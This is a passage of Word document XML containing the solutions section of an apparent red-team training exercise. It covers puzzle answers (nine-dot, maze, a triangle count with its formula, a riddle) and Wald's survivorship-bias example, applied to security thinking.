      <w:hyperlink r:id="rId145" w:anchor="solutions-dont-peek" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="573AB401" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The following are possible answers to the puzzles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02186EB2" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>9 DOT PUZZLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:anchor="9-dot-puzzle-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E5B5E74" w14:textId="06072F53" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31A4816C" wp14:editId="1E1C1229">
            <wp:extent cx="5731510" cy="171958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5731510" cy="1719580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12438666" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Possible answers are shown. How does your solution compare?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387C402" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>MAZE CHALLENGE</w:t>
      </w:r>
      <w:hyperlink r:id="rId148" w:anchor="maze-challenge-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A77491B" w14:textId="46147AF2" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F05CF39" wp14:editId="4D9667E1">
            <wp:extent cx="5731510" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="254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5731510" cy="2151380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C7C7B" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>When thinking about solutions to problems, don’t let assumptions and limitations prevent possible solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74805532" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>TRIANGLE PUZZLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId150" w:anchor="triangle-puzzle-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A51492F" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Total Triangles = 27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71912E" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>When faced with a problem for which you don’t know the "formula," a brute force approach may be needed. Lessons can be learned, and "formulas" can be added to your knowledge base to improve efficiency when faced with similar problems in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB43FC" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC162D" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">T(n) = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>floor(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>n*(n + 2)*(2n + 1) / 8)</w:t>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BB175" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053D21C" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>f(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>4) = 4*(4 + 2)*(2*4 + 1) / 8 = 27.000</w:t>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB058B6" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Reference: </w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>http://www.billthelizard.com/2009/08/how-many-triangles.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A47FE1C" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>WORD PUZZLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:anchor="word-puzzle-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26EC304C" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Classic Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0588F5" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The man had the hiccups and wanted a glass of water to help get rid of them. The bartender could hear the hiccups when the man spoke, so he brought the gun out to scare the hiccups away. It worked, and the man thanked him and left, no longer needing the glass of water.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564056E" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ALTERNATIVE THOUGHT PROCESSING</w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:anchor="alternative-thought-processing-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2931326A" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">During World War 2, the U.S. Navy performed a review of aircraft with combat encounters. This review intended to determine where aircraft needed additional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>armor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure survivability and safe return. Upon analysis the Navy decided all the locations where bullet holes were found needed to be better </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>armored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> as they are more likely to be hit. These included the tips of the wings, the central body, and the elevators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F67E419" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">A Navy Statistician, Abraham Wald had another theory. The areas with bullet holes identified where the aircraft was already survivable. He recommended </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>armoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the nose, engine, and mid-body although few of the aircraft had damage to those areas. Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA679E3" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Wald recognized those areas were also being shot; however, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>weren't able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> return safely. He correctly surmised that aircraft with shots to the wings, central body, and elevators were able to return while those with shots to the nose, engine, and mid-body were catastrophically damaged and unable to return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209EB509" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Consider how this scenario translates to Red Teaming or security in general. Also consider what is known (and unknown) given information from threat intelligence, current events, and indicators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393DD42" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Reference: Wald, Abraham. (1943). A Method of Estimating Plane Vulnerability Based on Damage of Survivors. Statistical Research Group, Columbia University. CRC 432” — reprint from July 1980, </w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>http://www.dtic.mil/get-tr-doc/pdf?AD=ADA091073&amp;Location=U2&amp;doc=GetTRDoc.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A9BEF49" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="6CEB8004">
          <v:rect id="_x0000_i1126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37BA35" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:anchor="conclusion" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13EF524E" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>In this exercise, you completed puzzles designed to encourage critical thinking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76936A26" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2739E332" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574707B0" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF1FF64" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8B1217" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242B3739" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A4F96E" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
